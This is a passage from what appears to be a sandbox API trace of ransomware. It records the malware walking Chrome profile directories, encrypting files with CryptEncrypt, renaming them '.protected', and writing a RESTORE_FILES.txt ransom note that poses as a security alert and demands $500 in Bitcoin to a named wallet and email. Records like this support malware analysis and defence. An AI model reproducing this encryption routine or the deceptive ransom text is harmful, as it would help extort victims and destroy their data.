HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\000003.log.protected")) returned 1 [0078.458] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.458] lstrcmpiW (lpString1="CURRENT", lpString2="Windows") returned -1 [0078.458] lstrcmpiW (lpString1="CURRENT", lpString2="Program Files") returned -1 [0078.458] lstrcmpiW (lpString1="CURRENT", lpString2="Program Files (x86)") returned -1 [0078.458] lstrcmpiW (lpString1="CURRENT", lpString2="$Recycle.bin") returned 1 [0078.458] lstrcmpiW (lpString1="CURRENT", lpString2="System Volume Information") returned -1 [0078.458] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT") returned 116 [0078.458] StrStrIW (lpFirst="CURRENT", lpSrch=".protected") returned 0x0 [0078.458] lstrcmpW (lpString1="CURRENT", lpString2="RESTORE_FILES.txt") returned -1 [0078.458] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.458] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.458] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\current"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.459] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT") returned 116 [0078.459] StrStrW (lpFirst="CURRENT", lpSrch=".txt") returned 0x0 [0078.459] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT") returned 116 [0078.459] StrStrW (lpFirst="CURRENT", lpSrch=".rar") returned 0x0 [0078.459] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT") returned 116 [0078.459] StrStrW (lpFirst="CURRENT", lpSrch=".zip") returned 0x0 [0078.459] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x10, lpOverlapped=0x0) returned 1 [0078.460] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffff0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.460] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x10, lpOverlapped=0x0) returned 1 [0078.460] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.460] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.460] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.460] CloseHandle (hObject=0x158) returned 1 [0078.460] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT.protected") returned 126 [0078.460] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\current"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\current.protected")) returned 1 [0078.461] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.461] lstrcmpiW (lpString1="LOCK", lpString2="Windows") returned -1 [0078.461] lstrcmpiW (lpString1="LOCK", lpString2="Program Files") returned -1 [0078.461] lstrcmpiW (lpString1="LOCK", lpString2="Program Files (x86)") returned -1 [0078.461] lstrcmpiW (lpString1="LOCK", lpString2="$Recycle.bin") returned 1 [0078.461] lstrcmpiW (lpString1="LOCK", lpString2="System Volume Information") returned -1 [0078.461] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK") returned 113 [0078.461] StrStrIW (lpFirst="LOCK", lpSrch=".protected") returned 0x0 [0078.461] lstrcmpW (lpString1="LOCK", lpString2="RESTORE_FILES.txt") returned -1 [0078.461] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.461] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.461] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\lock"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.461] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK") returned 113 [0078.461] StrStrW (lpFirst="LOCK", lpSrch=".txt") returned 0x0 [0078.461] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK") returned 113 [0078.461] StrStrW (lpFirst="LOCK", lpSrch=".rar") returned 0x0 [0078.461] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK") returned 113 [0078.461] StrStrW (lpFirst="LOCK", lpSrch=".zip") returned 0x0 [0078.462] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0078.462] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.462] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0078.462] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.462] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.463] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.463] CloseHandle (hObject=0x158) returned 1 [0078.463] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK.protected") returned 123 [0078.463] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\lock"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\lock.protected")) returned 1 [0078.463] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.463] lstrcmpiW (lpString1="LOG", lpString2="Windows") returned -1 [0078.463] lstrcmpiW (lpString1="LOG", lpString2="Program Files") returned -1 [0078.463] lstrcmpiW (lpString1="LOG", lpString2="Program Files (x86)") returned -1 [0078.464] lstrcmpiW (lpString1="LOG", lpString2="$Recycle.bin") returned 1 [0078.464] lstrcmpiW (lpString1="LOG", lpString2="System Volume Information") returned -1 [0078.464] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG") returned 112 [0078.464] StrStrIW (lpFirst="LOG", lpSrch=".protected") returned 0x0 [0078.464] lstrcmpW (lpString1="LOG", lpString2="RESTORE_FILES.txt") returned -1 [0078.464] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.464] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.464] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.464] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG") returned 112 [0078.464] StrStrW (lpFirst="LOG", lpSrch=".txt") returned 0x0 [0078.464] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG") returned 112 [0078.464] StrStrW (lpFirst="LOG", lpSrch=".rar") returned 0x0 [0078.464] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG") returned 112 [0078.464] StrStrW (lpFirst="LOG", lpSrch=".zip") returned 0x0 [0078.464] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0xa7, lpOverlapped=0x0) returned 1 [0078.465] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff59, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.465] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xa7, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0xa7, lpOverlapped=0x0) returned 1 [0078.466] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.466] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.466] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.466] CloseHandle (hObject=0x158) returned 1 [0078.466] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG.protected") returned 122 [0078.466] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log.protected")) returned 1 [0078.467] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.467] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Windows") returned -1 [0078.467] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Program Files") returned -1 [0078.467] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Program Files (x86)") returned -1 [0078.467] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="$Recycle.bin") returned 1 [0078.467] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="System Volume Information") returned -1 [0078.467] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001") returned 124 [0078.467] StrStrIW (lpFirst="MANIFEST-000001", lpSrch=".protected") returned 0x0 [0078.467] lstrcmpW (lpString1="MANIFEST-000001", lpString2="RESTORE_FILES.txt") returned -1 [0078.467] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.467] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.467] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\manifest-000001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.468] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001") returned 124 [0078.468] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".txt") returned 0x0 [0078.468] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001") returned 124 [0078.468] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".rar") returned 0x0 [0078.468] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001") returned 124 [0078.468] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".zip") returned 0x0 [0078.468] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x29, lpOverlapped=0x0) returned 1 [0078.468] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffffd7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.468] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x29, lpOverlapped=0x0) returned 1 [0078.469] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.469] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.469] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.469] CloseHandle (hObject=0x158) returned 1 [0078.469] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001.protected") returned 134 [0078.469] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\manifest-000001"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\manifest-000001.protected")) returned 1 [0078.470] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0078.470] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0078.470] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\RESTORE_FILES.txt") returned 126 [0078.470] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.470] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.470] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0078.471] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.471] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0078.471] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.471] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0078.471] CloseHandle (hObject=0x154) returned 1 [0078.471] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.471] lstrcmpiW (lpString1="Extension Rules", lpString2="Windows") returned -1 [0078.471] lstrcmpiW (lpString1="Extension Rules", lpString2="Program Files") returned -1 [0078.471] lstrcmpiW (lpString1="Extension Rules", lpString2="Program Files (x86)") returned -1 [0078.471] lstrcmpiW (lpString1="Extension Rules", lpString2="$Recycle.bin") returned 1 [0078.471] lstrcmpiW (lpString1="Extension Rules", lpString2="System Volume Information") returned -1 [0078.471] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 95 [0078.471] lstrcmpW (lpString1="Extension Rules", lpString2=".") returned 1 [0078.471] lstrcmpW (lpString1="Extension Rules", lpString2="..") returned 1 [0078.471] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\*") returned 97 [0078.471] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0078.478] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.478] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.478] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.478] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.478] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.478] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\.") returned 97 [0078.478] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.478] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.478] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.478] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.478] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.478] lstrcmpiW (lpString1="..", 